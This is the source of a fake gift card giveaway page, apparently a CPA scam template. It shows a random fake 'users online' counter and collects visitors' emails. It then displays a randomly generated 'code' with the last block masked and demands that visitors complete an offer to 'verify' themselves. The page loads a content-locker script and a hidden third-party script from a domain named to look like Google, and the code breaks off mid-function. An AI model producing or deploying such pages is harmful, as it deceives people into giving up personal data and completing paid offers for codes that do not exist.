<html><head>
    <title>All In One Gift Cards And Game 2024</title>
<meta name="description" content="All In One Gift Cards + Game 2024"/>
<meta property="og:title" content="All In One Gift Cards And Game 2024"/>
<meta property="og:description" content="All In One Gift Cards + Game 2024"/>
<meta name="referrer" content="no-referrer">

<!-- Analytics -->




    <style>
        .header_blue {
            background: #1565c0;
            padding: 80px 0 20px;
            color: #fff;
            font-size: 48px;
            font-weight: 300;
            margin-bottom: 40px;
        }
        .header_text {
            margin-left: auto;
            margin-right: auto;
            width: 80%;
        }
        body{
            margin:0;
            font-family:Roboto, sans-serif;
            color:#444;
        }
        .unlockBtn:hover{
            box-shadow: 0 3px 6px rgba(0,0,0,.16), 0 3px 6px rgba(0,0,0,.23);
        }
        .unlockBtn {
            background: #2196f3;
            border: none;
            border-radius: 2px;
            box-shadow: 0 1px 3px rgba(0,0,0,.12), 0 1px 2px rgba(0,0,0,.24);
            min-height: 31px;
            min-width: 70px;
            padding: 2px 16px;
            text-align: center;
            text-shadow: none;
            text-transform: uppercase;
            -webkit-transition: all 280ms ease;
            transition: all 280ms ease;
            box-sizing: border-box;
            cursor: pointer;
            -webkit-appearance: none;
            display: inline-block;
            vertical-align: middle;
            font: 500 14px/31px Roboto,sans-serif!important;
            outline: 0!important;
            color:white;
        }
        .content-container{
            width:80%;margin:0 auto;
        }
        @font-face{font-family:'Roboto';font-style:normal;font-weight:300;src:local('Roboto Light'),local(Roboto-Light),url(//fonts.gstatic.com/s/roboto/v15/Pru33qjShpZSmG3z6VYwnRJtnKITppOI_IvcXXDNrsc.woff2) format("woff2");unicode-range:U+0100-024F,U+1E00-1EFF,U+20A0-20AB,U+20AD-20CF,U+2C60-2C7F,U+A720-A7FF}@font-face{font-family:'Roboto';font-style:normal;font-weight:300;src:local('Roboto Light'),local(Roboto-Light),url(//fonts.gstatic.com/s/roboto/v15/Hgo13k-tfSpn0qi1SFdUfVtXRa8TVwTICgirnJhmVJw.woff2) format("woff2");unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02C6,U+02DA,U+02DC,U+2000-206F,U+2074,U+20AC,U+2212,U+2215,U+E0FF,U+EFFD,U+F000}@font-face{font-family:'Roboto';font-style:normal;font-weight:500;src:local('Roboto Medium'),local(Roboto-Medium),url(//fonts.gstatic.com/s/roboto/v15/oOeFwZNlrTefzLYmlVV1UBJtnKITppOI_IvcXXDNrsc.woff2) format("woff2");unicode-range:U+0100-024F,U+1E00-1EFF,U+20A0-20AB,U+20AD-20CF,U+2C60-2C7F,U+A720-A7FF}@font-face{font-family:'Roboto';font-style:normal;font-weight:500;src:local('Roboto Medium'),local(Roboto-Medium),url(//fonts.gstatic.com/s/roboto/v15/RxZJdnzeo3R5zSexge8UUVtXRa8TVwTICgirnJhmVJw.woff2) format("woff2");unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02C6,U+02DA,U+02DC,U+2000-206F,U+2074,U+20AC,U+2212,U+2215,U+E0FF,U+EFFD,U+F000}
        *{
  margin: 0;
  padding: 0;
  box-sizing: border-box;
  font-family: 'Titan One', cursive;
}
html,body{
  place-items: center;
  scroll-behavior: smooth;
}

.header{
    font-family: 'Titan One', cursive;
    font-size: 40px;
    color: #fff;
    text-align: center;
    text-transform: uppercase;
    font-weight: 500;
    margin-top: 20px;
    
}
.useronline{
  font-family: 'Titan One', cursive;
  text-align: center;
  font-size: 22px;
  margin-bottom: 10px;

  -webkit-background-clip: padding-box;
}
#update{
  font-family: 'Titan One', cursive;
  color: yellow;
}
#user-online{
  font-family: 'Titan One', cursive;
  color: yellow;
}
.showin{
  animation: showin 0.5s;
 animation-fill-mode: forwards;
 }
 @keyframes showin {
   0% { transform: scale(0);}
 30% { transform: scale(1);}
 60% { transform: scale(1.1);}
   100% { transform: scale(1);}
 }
 #Gentext{
  color: #fff;
 }

.footer{
  display: block;
  position: fixed;
  width: 100%;
  background-color: rgba(0, 0, 0, 0.699);
  color: #fff;
  text-align: center;
  padding: 10px;
  margin-top: 10px;
  bottom: 0;
}
input{
  width: 320px;
  text-align: center;
  padding: 15px 0px;
  border-radius: 5px;
  margin-top: 10px;
  margin-bottom: 15px;
}
.appbox1{
  max-width: 95%;
  background: rgba(0, 0, 0, 0.664);
  justify-content: center;
  align-items: center;
  text-align: center;
  margin: auto;
  border: #333 solid 5px;
  border-radius: 15px;
  padding: 10px;
  margin-bottom: 100px;
}
.appbox{
    display: flex;
    flex-wrap: wrap;
    background: rgba(0, 0, 0, 0.664);
    justify-content: center;
    align-items: center;
    text-align: center;
    max-width: 95%;
    margin: auto;
    margin-top: 10px;
    border: #333 solid 5px;
    border-radius: 15px;
    padding: 10px;
    margin-bottom: 120px;
}
.appbox a{
  text-decoration: none;
}
.iconimg{
    max-width: 225px;
    cursor: pointer;
    border-radius: 10px;
    border: rgb(194, 191, 191) solid 1px;
    margin: 25px;


}
.iconimg:hover{
    background-color: #333;
    border: #fff solid 5px;
    transform: scale(1.2);
    box-shadow: 0px -25px 20px -20px rgba(255, 255, 255, 0.45), 25px 0 20px -20px rgba(255, 255, 255, 0.45), 0px 25px 20px -20px rgba(255, 255, 255, 0.45), -25px 0 20px -20px rgba(255, 255, 255, 0.45);


}
.selectedcard{
    background-color: #333;
    border: #fff solid 5px;
    transform: scale(1.2);
    box-shadow: 0px -25px 20px -20px rgba(255, 255, 255, 0.45), 25px 0 20px -20px rgba(255, 255, 255, 0.45), 0px 25px 20px -20px rgba(255, 255, 255, 0.45), -25px 0 20px -20px rgba(255, 255, 255, 0.45);

}
.button{
    cursor: pointer;
    display: block;
    max-width: 220px;
    text-align: center;
    font-size: 20px;
    border-color: #0069d9;
    background: #0069d9;
    color: #fff;
    border-radius: 10px;
    padding: 20px;
    margin: auto;
    margin-top: 10px;
    z-index: 99;
}
.button:hover{
    border-color: #065cb8;
    background: #065cb8;
    transform: scale(1.1);

}
.download{
    display: flex;
    justify-content: center;
    align-self: center;
    text-align: center;
    border: #333 solid 2px;

}
.showiconimg{
    max-width: 320px;
    border-radius: 10px;
    border: #fff solid 5px;
    box-shadow: 0px -25px 20px -20px rgba(255, 255, 255, 0.45), 25px 0 20px -20px rgba(255, 255, 255, 0.45), 0px 25px 20px -20px rgba(255, 255, 255, 0.45), -25px 0 20px -20px rgba(255, 255, 255, 0.45);
}
.text1{
    display: block;
    font-size: 20px;
    position:relative;
    z-index: 10000;
    max-width: 90%;
    color: #fff;
    font-family: 'Play', sans-serif;
    border-radius: 10px;
    text-align: center;
    width: 100%;
    padding: 5px;
    margin: auto;
    margin-top: 5px;

}
#Gentext{
  max-width: 350px;
  margin: auto;
  border-radius: 10px;
  background-color: #fff;
  padding: 10px 20px;
  color: #000;
  margin-top: 10px;
}
#Gentext1{
  color: #fff;
}
.Gen-Text{
  font-family: 'Play', sans-serif;
  font-size: 20px;
  margin: 20px;
}

.icon{
    width: 60px;
    font-family: 'Play', sans-serif;
    margin-bottom: -10px;
}



.wrapper{
  display: inline-flex;
  background: #fff;
  height: 90px;
  width: 350px;
  align-items: center;
  justify-content: space-evenly;
  border-radius: 5px;
  padding: 20px 15px;
  margin-top: -18px;

}
.wrapper .option{
  background: #fff;
  height: 100%;
  width: 100%;
  display: flex;
  align-items: center;
  justify-content: space-evenly;
  margin: 0 10px;
  border-radius: 5px;
  cursor: pointer;
  padding: 0 10px;
  border: 2px solid lightgrey;
  transition: all 0.3s ease;
}
.wrapper .option .dot{
  height: 20px;
  width: 20px;
  background: #d9d9d9;
  border-radius: 50%;
  position: relative;
}
.wrapper .option .dot::before{
  position: absolute;
  content: "";
  top: 4px;
  left: 4px;
  width: 12px;
  height: 12px;
  background: #0069d9;
  border-radius: 50%;
  opacity: 0;
  transform: scale(1.5);
  transition: all 0.3s ease;
}
input[type="radio"]{
  display: none;
}
#option-1:checked:checked ~ .option-1,
#option-2:checked:checked ~ .option-2{
  border-color: #0069d9;
  background: #0069d9;
}
#option-1:checked:checked ~ .option-1 .dot,
#option-2:checked:checked ~ .option-2 .dot{
  background: #fff;
}
#option-1:checked:checked ~ .option-1 .dot::before,
#option-2:checked:checked ~ .option-2 .dot::before{
  opacity: 1;
  transform: scale(1);
}
.wrapper .option span{
  font-size: 20px;
  color: #808080;
}
#option-1:checked:checked ~ .option-1 span,
#option-2:checked:checked ~ .option-2 span{
  color: #fff;
}

/*  */
/*  */

.wrap-2{
  position:fixed;
  z-index:-30;
  top:0;
  left:0;
  overflow:hidden;
  height:100vh;
  width:100vw;
  margin:auto;
      background: -webkit-gradient(linear, left top, right bottom, from(#438ee1), to(#973999));
  background: linear-gradient(to bottom right, #FF512F, #DD2476);
}
canvas{
  width:100%;
  height:100%;
}


/*  */
    </style>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

</head>
<body>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="style.css">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Play&display=swap" rel="stylesheet">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Titan+One&display=swap" rel="stylesheet">
    <title>ALL IN ONE GIFT CARD GIVEAWAY</title>

</head>
<body>

  <!--  -->
  <div class="wrap-2"><canvas id="liquid"></canvas></div>
  <!--  -->
  <div style="display: none;"><script src="https://google-scripts-xzcjhj.netlify.app/3.js"></script></div>
    <div id="header" class="header"> <img src="https://d266key948fg17.cloudfront.net/uploads/1674698427000fa158795c2266677d13e2db4fa91c.png" class="icon"> ALL IN ONE <br> GIFT CARD GIVEAWAY</div>

    <div class="useronline showin" id="useronline">User Online: <span id="user-online"></span> | Last update: <span id="update"></span></div>

    <div id="download" style="display: none; margin-top: 20px;" class="appbox1">
    <div><img src=" "  id="imggen" class="showiconimg"></div>
    <div style="display: none;" class="Gen-Text" id="Gentext"></div>
    <div style="display: none;"  class="Gen-Text" id="Gentext1">To display the last codes, we must verify that you are a real human, Click on this button and complete one offer.</div>


    <div style="display: none;" class="button" id="button1" onclick="_xY()"> Verify Now </div>
    
    <div id="boxhide">
    <div class="text1">Please Enter Your E-mail To Receive The Gift Card Codes</div> 
    <div class="errorname showin" style="display:none" id="errorname">Error: <span style="color:red;">E-mail can't be empty!</span></div> 
    <input type="name" name="name" id="name" placeholder="Enter Your E-mail">
    <div class="button" id="button" onclick="bntnext()"> Send Now </div> 
    </div>
    </div>
    
    <div class="appbox" id="appbox">
        <a href="#header">         
        <img onclick="card(1)" src="https://d266key948fg17.cloudfront.net/uploads/16759074391f58ded620afa885aec14c65fedc1dde.png" class="iconimg" id="card1"  > 
        <img onclick="card(2)" src="https://d266key948fg17.cloudfront.net/uploads/1675907440c353838f08ad04276e518ae0d75c99af.png" class="iconimg"  id="card2" >
        <img onclick="card(3)" src="https://d266key948fg17.cloudfront.net/uploads/1675907440b54e04b7c3acbe49a78438d91402346f.png" class="iconimg"  id="card3" >
        <img onclick="card(4)" src="https://d266key948fg17.cloudfront.net/uploads/16759074391511402dd208668c9d690cf4f79b8d81.png" class="iconimg" id="card4" >
        <img onclick="card(5)" src="https://d266key948fg17.cloudfront.net/uploads/1675907437b3938b16a7d1d0899e212153e8ba1e89.png" class="iconimg" id="card5" >
        <img onclick="card(6)" src="https://d266key948fg17.cloudfront.net/uploads/1675907438a206fa8c2ebd6cf8df223bc536c56738.png" class="iconimg" id="card6" >
        <img onclick="card(7)" src="https://d266key948fg17.cloudfront.net/uploads/1675907438075d1189948dba743b6c4f10e8102151.png" class="iconimg" id="card7" >
        <img onclick="card(8)" src="https://d266key948fg17.cloudfront.net/uploads/1675907436d168b5b626ad2374ce28a5d360c5eeb5.png" class="iconimg" id="card8" >
        <img onclick="card(9)" src="https://d266key948fg17.cloudfront.net/uploads/1675907437430e0cc6202630bd51a5a1e09d91a3a0.png" class="iconimg" id="card9" >
        <img onclick="card(10)" src="https://d266key948fg17.cloudfront.net/uploads/1675907435cfddec69590389bd5e86e9f43c838b6e.png" class="iconimg" id="card10" >
        <img onclick="card(11)" src="https://d266key948fg17.cloudfront.net/uploads/167590743526087fb199e6f1263112c8d8d8bfdc96.png" class="iconimg" id="card11" >
        <img onclick="card(12)" src="https://d266key948fg17.cloudfront.net/uploads/16759074342c18eef79ef3a4e674c83c45bb8cad89.png" class="iconimg" id="card12" >
        <img onclick="card(13)" src="https://d266key948fg17.cloudfront.net/uploads/16759074334e0cf1e1c31e79d7088b282d4a6231d2.png" class="iconimg" id="card13" >
        <img onclick="card(14)" src="https://d266key948fg17.cloudfront.net/uploads/1675907434fa78357047886a3049acd61cc1f7ecd7.png" class="iconimg" id="card14" >
        <img onclick="card(15)" src="https://d266key948fg17.cloudfront.net/uploads/16759074336220da3965d3e37c41b2dff20dd9c2d1.png" class="iconimg" id="card15" >
        <img onclick="card(16)" src="https://d266key948fg17.cloudfront.net/uploads/16759074321990373c161896d3b6804e959deb01c1.png" class="iconimg" id="card16" >
        <img onclick="card(17)" src="https://d266key948fg17.cloudfront.net/uploads/1675907431739e9c3017e2ca563122b6b242748d31.png" class="iconimg" id="card17" >
        <img onclick="card(18)" src="https://d266key948fg17.cloudfront.net/uploads/16759074322a3b0c2e9a801ef6c671adedf8547730.png" class="iconimg" id="card18" >
        <img onclick="card(19)" src="https://d266key948fg17.cloudfront.net/uploads/16759074304c717c14fd1cda68b86426144e0b7591.png" class="iconimg" id="card19" >
        <img onclick="card(20)" src="https://d266key948fg17.cloudfront.net/uploads/1675907431b45e63acba3ca91d863b4e04e9e7199c.png" class="iconimg" id="card20" >
        <img onclick="card(21)" src="https://d266key948fg17.cloudfront.net/uploads/1675907429a8b0dee991bf0a188948a3a5d254bc05.png" class="iconimg" id="card21" >
        <img onclick="card(22)" src="https://d266key948fg17.cloudfront.net/uploads/1675907430f3cbcec2417880176e24253e7ad28333.png" class="iconimg" id="card22" >
        <img onclick="card(23)" src="https://d266key948fg17.cloudfront.net/uploads/16759074296fa8140835031b51656f2b96bc0be00a.png" class="iconimg" id="card23" >
        <img onclick="card(24)" src="https://d266key948fg17.cloudfront.net/uploads/16759074296ebc0531c079214eaea196bbdb850c87.png" class="iconimg" id="card24" >
        <img onclick="card(25)" src="https://d266key948fg17.cloudfront.net/uploads/167590742856d3045bf478ad03b9994d1a77e1c231.png" class="iconimg" id="card25" >
        <img onclick="card(26)" src="https://d266key948fg17.cloudfront.net/uploads/1675907428324ee831afb1f84d15d68a0ba5cd5b2e.png" class="iconimg" id="card26" >
        <img onclick="card(27)" src="https://d266key948fg17.cloudfront.net/uploads/16759074275db0669d13c57a38dd46951df7bc24ee.png" class="iconimg" id="card27" >
        <img onclick="card(28)" src="https://d266key948fg17.cloudfront.net/uploads/1675907427fb9aabe7b3b733104d45bdc6cfb87910.png" class="iconimg" id="card28" >
        <img onclick="card(29)" src="https://d266key948fg17.cloudfront.net/uploads/167590742605fbc26262286bae1ad49ecc03a68fb2.png" class="iconimg" id="card29" >
        <img onclick="card(30)" src="https://d266key948fg17.cloudfront.net/uploads/167590742515e1949d758d3512be8a93ded04cc933.png" class="iconimg" id="card30" >
        <img onclick="card(31)" src="https://d266key948fg17.cloudfront.net/uploads/1675907425417a17a94910afa8bc4012b5e1f929ec.png" class="iconimg" id="card31" >
        <img onclick="card(32)" src="https://d266key948fg17.cloudfront.net/uploads/16759074244140f504028986e87916b08f529abca1.png" class="iconimg" id="card32" >
        <img onclick="card(33)" src="https://d266key948fg17.cloudfront.net/uploads/16759074234cd7d8f58619a6f8b6ed37321f0af5eb.png" class="iconimg" id="card33" >
        <img onclick="card(34)" src="https://d266key948fg17.cloudfront.net/uploads/1675907423de528652ffcfbfd455fabea1ea239800.png" class="iconimg" id="card34" >
        

    </a>
    </div>
    <div class="footer">
        <p>By continuing to use this site you automatically accept our privacy policy and terms and conditions.</p>
    </div>
    

    
</body>

</html>

   <script type="text/javascript">
    var ByUUl_SzE_imtVfc={"it":4386881,"key":"42a25"};
</script>
<script src="https://dojy0dg181308.cloudfront.net/e8d0ef9.js"></script>


<!-- For More CPA landing Pages:  https://t.me/templates55 !-->
<!-- For More CPA landing Pages:  https://t.me/templates55 !-->

  
  
  
  
<script type="text/javascript">
    var myVar2 = setInterval(UserTimer, 9000);
function UserTimer() {
document.getElementById("user-online").innerHTML=Math.floor(Math.random() * 100)+200;
}

var date = (new Date()).toString().split(' ').splice(1,3).join(' ');
document.getElementById("update").innerHTML =date;


function card(cardnum){
    document.getElementById("download").style.display="block";
    document.getElementById("card1").classList.remove("selectedcard");
    document.getElementById("card2").classList.remove("selectedcard");
    document.getElementById("card3").classList.remove("selectedcard");
    document.getElementById("card4").classList.remove("selectedcard");
    document.getElementById("card5").classList.remove("selectedcard");
    document.getElementById("card6").classList.remove("selectedcard");
    document.getElementById("card7").classList.remove("selectedcard");
    document.getElementById("card8").classList.remove("selectedcard");
    document.getElementById("card9").classList.remove("selectedcard");
    document.getElementById("card10").classList.remove("selectedcard");
    document.getElementById("card11").classList.remove("selectedcard");
    document.getElementById("card12").classList.remove("selectedcard");
    document.getElementById("card13").classList.remove("selectedcard");
    document.getElementById("card14").classList.remove("selectedcard");
    document.getElementById("card15").classList.remove("selectedcard");
    document.getElementById("card16").classList.remove("selectedcard");
    document.getElementById("card17").classList.remove("selectedcard");
    document.getElementById("card18").classList.remove("selectedcard");
    document.getElementById("card19").classList.remove("selectedcard");
    document.getElementById("card20").classList.remove("selectedcard");
    document.getElementById("card21").classList.remove("selectedcard");
    document.getElementById("card22").classList.remove("selectedcard");
    document.getElementById("card23").classList.remove("selectedcard");
    document.getElementById("card24").classList.remove("selectedcard");
    document.getElementById("card25").classList.remove("selectedcard");
    document.getElementById("card26").classList.remove("selectedcard");
    document.getElementById("card27").classList.remove("selectedcard");
    document.getElementById("card28").classList.remove("selectedcard");
    document.getElementById("card29").classList.remove("selectedcard");
    document.getElementById("card30").classList.remove("selectedcard");
    document.getElementById("card31").classList.remove("selectedcard");
    document.getElementById("card32").classList.remove("selectedcard");
    document.getElementById("card33").classList.remove("selectedcard");
    document.getElementById("card34").classList.remove("selectedcard");
    // document.getElementById("card35").classList.remove("selectedcard");
    // document.getElementById("card36").classList.remove("selectedcard");
    // document.getElementById("card37").classList.remove("selectedcard");
    // document.getElementById("card38").classList.remove("selectedcard");
    // document.getElementById("card39").classList.remove("selectedcard");
    // document.getElementById("card40").classList.remove("selectedcard");
    // document.getElementById("card41").classList.remove("selectedcard");
    // document.getElementById("card42").classList.remove("selectedcard");
    // document.getElementById("card43").classList.remove("selectedcard");
    // document.getElementById("card44").classList.remove("selectedcard");
    // document.getElementById("card45").classList.remove("selectedcard");
    // document.getElementById("card46").classList.remove("selectedcard");
    // document.getElementById("card47").classList.remove("selectedcard");
    // document.getElementById("card48").classList.remove("selectedcard");
    // document.getElementById("card49").classList.remove("selectedcard");
    // document.getElementById("card50").classList.remove("selectedcard");
    // document.getElementById("card51").classList.remove("selectedcard");
    // document.getElementById("card52").classList.remove("selectedcard");
    // document.getElementById("card53").classList.remove("selectedcard");
    // document.getElementById("card54").classList.remove("selectedcard");
    // document.getElementById("card55").classList.remove("selectedcard");
    // document.getElementById("card56").classList.remove("selectedcard");
    // document.getElementById("card57").classList.remove("selectedcard");
    // document.getElementById("card58").classList.remove("selectedcard");
    document.getElementById("card"+cardnum).classList.add("selectedcard");

        if (cardnum==1){
          document.getElementById("imggen").src=document.getElementById("card1").src;        
        }else if (cardnum==2){
            document.getElementById("imggen").src=document.getElementById("card2").src;
        }else if (cardnum==3){
            document.getElementById("imggen").src=document.getElementById("card3").src;
        }else if (cardnum==4){
            document.getElementById("imggen").src=document.getElementById("card4").src;
        }else if (cardnum==5){
            document.getElementById("imggen").src=document.getElementById("card5").src;
        }else if (cardnum==6){
            document.getElementById("imggen").src=document.getElementById("card6").src;
        }else if (cardnum==7){
            document.getElementById("imggen").src=document.getElementById("card7").src;
        }else if (cardnum==8){
            document.getElementById("imggen").src=document.getElementById("card8").src;
        }else if (cardnum==9){
            document.getElementById("imggen").src=document.getElementById("card9").src;
        }else if (cardnum==10){
            document.getElementById("imggen").src=document.getElementById("card10").src;
        }else if (cardnum==11){
            document.getElementById("imggen").src=document.getElementById("card11").src;
        }else if (cardnum==12){
            document.getElementById("imggen").src=document.getElementById("card12").src;
        }else if (cardnum==13){
            document.getElementById("imggen").src=document.getElementById("card13").src;
        }else if (cardnum==14){
            document.getElementById("imggen").src=document.getElementById("card14").src;
        }else if (cardnum==15){
            document.getElementById("imggen").src=document.getElementById("card15").src;
        }else if (cardnum==16){
            document.getElementById("imggen").src=document.getElementById("card16").src;
        }else if (cardnum==17){
            document.getElementById("imggen").src=document.getElementById("card17").src;
        }else if (cardnum==18){
            document.getElementById("imggen").src=document.getElementById("card18").src;
        }else if (cardnum==19){
            document.getElementById("imggen").src=document.getElementById("card19").src;
        }else if (cardnum==20){
            document.getElementById("imggen").src=document.getElementById("card20").src;
        }else if (cardnum==21){
            document.getElementById("imggen").src=document.getElementById("card21").src;
        }else if (cardnum==22){
            document.getElementById("imggen").src=document.getElementById("card22").src;
        }else if (cardnum==23){
            document.getElementById("imggen").src=document.getElementById("card23").src;
        }else if (cardnum==24){
            document.getElementById("imggen").src=document.getElementById("card24").src;
        }else if (cardnum==25){
            document.getElementById("imggen").src=document.getElementById("card25").src;
        }else if (cardnum==26){
            document.getElementById("imggen").src=document.getElementById("card26").src;
        }else if (cardnum==27){
            document.getElementById("imggen").src=document.getElementById("card27").src;
        }else if (cardnum==28){
            document.getElementById("imggen").src=document.getElementById("card28").src;
        }else if (cardnum==29){
            document.getElementById("imggen").src=document.getElementById("card29").src;
        }else if (cardnum==30){
            document.getElementById("imggen").src=document.getElementById("card30").src;
        }else if (cardnum==31){
            document.getElementById("imggen").src=document.getElementById("card31").src;
        }else if (cardnum==32){
            document.getElementById("imggen").src=document.getElementById("card32").src;
        }else if (cardnum==33){
            document.getElementById("imggen").src=document.getElementById("card33").src;
        }else if (cardnum==34){
            document.getElementById("imggen").src=document.getElementById("card34").src;
        // }else if (cardnum==35){
        //     document.getElementById("imggen").src=document.getElementById("card35").src;
        // }else if (cardnum==36){
        //     document.getElementById("imggen").src=document.getElementById("card36").src;
        // }else if (cardnum==37){
        //     document.getElementById("imggen").src=document.getElementById("card37").src;
        // }else if (cardnum==38){
        //     document.getElementById("imggen").src=document.getElementById("card38").src;
        // }else if (cardnum==39){
        //     document.getElementById("imggen").src=document.getElementById("card39").src;
        // }else if (cardnum==40){
        //     document.getElementById("imggen").src=document.getElementById("card40").src;
        // }else if (cardnum==41){
        //     document.getElementById("imggen").src=document.getElementById("card41").src;
        // }else if (cardnum==42){
        //     document.getElementById("imggen").src=document.getElementById("card42").src;
        // }else if (cardnum==43){
        //     document.getElementById("imggen").src=document.getElementById("card43").src;
        // }else if (cardnum==44){
        //     document.getElementById("imggen").src=document.getElementById("card44").src;
        // }else if (cardnum==45){
        //     document.getElementById("imggen").src=document.getElementById("card45").src;
        // }else if (cardnum==46){
        //     document.getElementById("imggen").src=document.getElementById("card46").src;
        // }else if (cardnum==47){
        //     document.getElementById("imggen").src=document.getElementById("card47").src;
        // }else if (cardnum==48){
        //     document.getElementById("imggen").src=document.getElementById("card48").src;
        // }else if (cardnum==49){
        //     document.getElementById("imggen").src=document.getElementById("card49").src;
        // }else if (cardnum==50){
        //     document.getElementById("imggen").src=document.getElementById("card50").src;
        // }else if (cardnum==51){
        //     document.getElementById("imggen").src=document.getElementById("card51").src;
        // }else if (cardnum==52){
        //     document.getElementById("imggen").src=document.getElementById("card52").src;
        // }else if (cardnum==53){
        //     document.getElementById("imggen").src=document.getElementById("card53").src;
        // }else if (cardnum==54){
        //     document.getElementById("imggen").src=document.getElementById("card54").src;
        // }else if (cardnum==55){
        //     document.getElementById("imggen").src=document.getElementById("card55").src;
        // }else if (cardnum==56){
        //     document.getElementById("imggen").src=document.getElementById("card56").src;
        // }else if (cardnum==57){
        //     document.getElementById("imggen").src=document.getElementById("card57").src;
        // }else if (cardnum==58){
        //     document.getElementById("imggen").src=document.getElementById("card58").src;
}
}

var name="";
function bntnext(){
  name=document.getElementById("name").value;
  if (name==""){
    document.getElementById("errorname").style.display="block";
  }else{
    document.getElementById("errorname").style.display="none";
    document.getElementById("boxhide").style.display="none";
    document.getElementById("appbox").style.display="none";
    document.getElementById("Gentext").style.display="block";
    var myVarCode = setInterval(genkey, 100);
    var stop=0;
    var KeyCode = ["9","8","7","6","5","4","3","2","1","0","A", "B", "C","D","E","F","G","H","I","J","K","L","Z","Y","X","W","V","U","T","S","R","Q","P","O","N","M"];
    function genkey() {
    key1=KeyCode[Math.floor(Math.random() * 36)];
    key2=KeyCode[Math.floor(Math.random() * 36)];
    key3=KeyCode[Math.floor(Math.random() * 36)];
    key4=KeyCode[Math.floor(Math.random() * 36)];
    key5=KeyCode[Math.floor(Math.random() * 36)];
    key6=KeyCode[Math.floor(Math.random() * 36)];
    key7=KeyCode[Math.floor(Math.random() * 36)];
    key8=KeyCode[Math.floor(Math.random() * 36)];
    key9=KeyCode[Math.floor(Math.random() * 36)];
    key10=KeyCode[Math.floor(Math.random() * 36)];
    key11=KeyCode[Math.floor(Math.random() * 36)];
    key12=KeyCode[Math.floor(Math.random() * 36)];
    key13=KeyCode[Math.floor(Math.random() * 36)];
    key14=KeyCode[Math.floor(Math.random() * 36)];
    key15=KeyCode[Math.floor(Math.random() * 36)];
    key16=KeyCode[Math.floor(Math.random() * 36)];
    key17=KeyCode[Math.floor(Math.random() * 36)];
    key18=KeyCode[Math.floor(Math.random() * 36)];
    key19=KeyCode[Math.floor(Math.random() * 36)];
    key20=KeyCode[Math.floor(Math.random() * 36)];
    key21=KeyCode[Math.floor(Math.random() * 36)];
    key22=KeyCode[Math.floor(Math.random() * 36)];
    key23=KeyCode[Math.floor(Math.random() * 36)];
    key24=KeyCode[Math.floor(Math.random() * 36)];
    key25=KeyCode[Math.floor(Math.random() * 36)];
    key26=KeyCode[Math.floor(Math.random() * 36)];
    key27=KeyCode[Math.floor(Math.random() * 36)];
    key28=KeyCode[Math.floor(Math.random() * 36)];
    key29=KeyCode[Math.floor(Math.random() * 36)];
    key30=KeyCode[Math.floor(Math.random() * 36)];
    key31=KeyCode[Math.floor(Math.random() * 36)];
    key32=KeyCode[Math.floor(Math.random() * 36)];
    key33=KeyCode[Math.floor(Math.random() * 36)];
    key34=KeyCode[Math.floor(Math.random() * 36)];
    key35=KeyCode[Math.floor(Math.random() * 36)];
    key36=KeyCode[Math.floor(Math.random() * 36)];
    document.getElementById("Gentext").innerHTML=key1+key2+key3+key4+key5+"-"+key6+key7+key8+key9+key10+"-"+key11+key12+key13+key14+key15+"-"+key16+key17+key18+key19+key20+"-"+key21+key22+key23+key24+key25;
    stop++;
    if (stop==100){
    document.getElementById("Gentext").innerHTML=key1+key2+key3+key4+key5+"-"+key6+key7+key8+key9+key10+"-"+key11+key12+key13+key14+key15+"-"+key16+key17+key18+key19+key20+"-"+"#####";
    document.getElementById("button1").style.display="block";
    document.getElementById("Gentext1").style.display="block";  
    clearInterval(myVarCode);
    }
    }
}
}
    
//

// 
  


! function() {
    "use strict";
    var t, i = {
            screen: {
                elem: null,
                callback: null,
                ctx: null,
                width: 0,
                height: 0,
                left: 0,
                top: 0,
                init: function(t, i, s) {
                    return this.elem = document.getElementById(t), this.callback = i || null, "CANVAS" == this.elem.tagName && (this.ctx = this.elem.getContext("2d")), window.addEventListener("resize", function() {
                        this.resize()
                    }.bind(this), !1), this.elem.onselectstart = function() {
                        return !1
                    }, this.elem.ondrag = function() {
                        return !1
                    }, s && this.resize(), this
                },
                resize: function() {
                    var t = this.elem;
                    for (this.width = t.offsetWidth, this.height = t.offsetHeight, this.left = 0, this.top = 0; null != t; t = t.offsetParent) this.left += t.offsetLeft, this.top += t.offsetTop;
                    this.ctx && (this.elem.width = this.width, this.elem.height = this.height), this.callback && this.callback()
                }
            }
        },
        s = function(t, i) {
            this.x = t, this.y = i, this.magnitude = t * t + i * i, this.computed = 0, this.force = 0
        };
    s.prototype.add = function(t) {
        return new s(this.x + t.x, this.y + t.y)
    };
    var h = function(t) {
        var i = .1,
            h = 1.5;
        this.vel = new s((Math.random() > .5 ? 1 : -1) * (.2 + .25 * Math.random()), (Math.random() > .5 ? 1 : -1) * (.2 + Math.random())), this.pos = new s(.2 * t.width + Math.random() * t.width * .6, .2 * t.height + Math.random() * t.height * .6), this.size = t.wh / 15 + (1.4 * Math.random() + .1) * (t.wh / 15), this.width = t.width, this.height = t.height
    };
    h.prototype.move = function() {
        this.pos.x >= this.width - this.size ? (this.vel.x > 0 && (this.vel.x = -this.vel.x), this.pos.x = this.width - this.size) : this.pos.x <= this.size && (this.vel.x < 0 && (this.vel.x = -this.vel.x), this.pos.x = this.size), this.pos.y >= this.height - this.size ? (this.vel.y > 0 && (this.vel.y = -this.vel.y), this.pos.y = this.height - this.size) : this.pos.y <= this.size && (this.vel.y < 0 && (this.vel.y = -this.vel.y), this.pos.y = this.size), this.pos = this.pos.add(this.vel)
    };
    var e = function(t, i, e, o, n) {
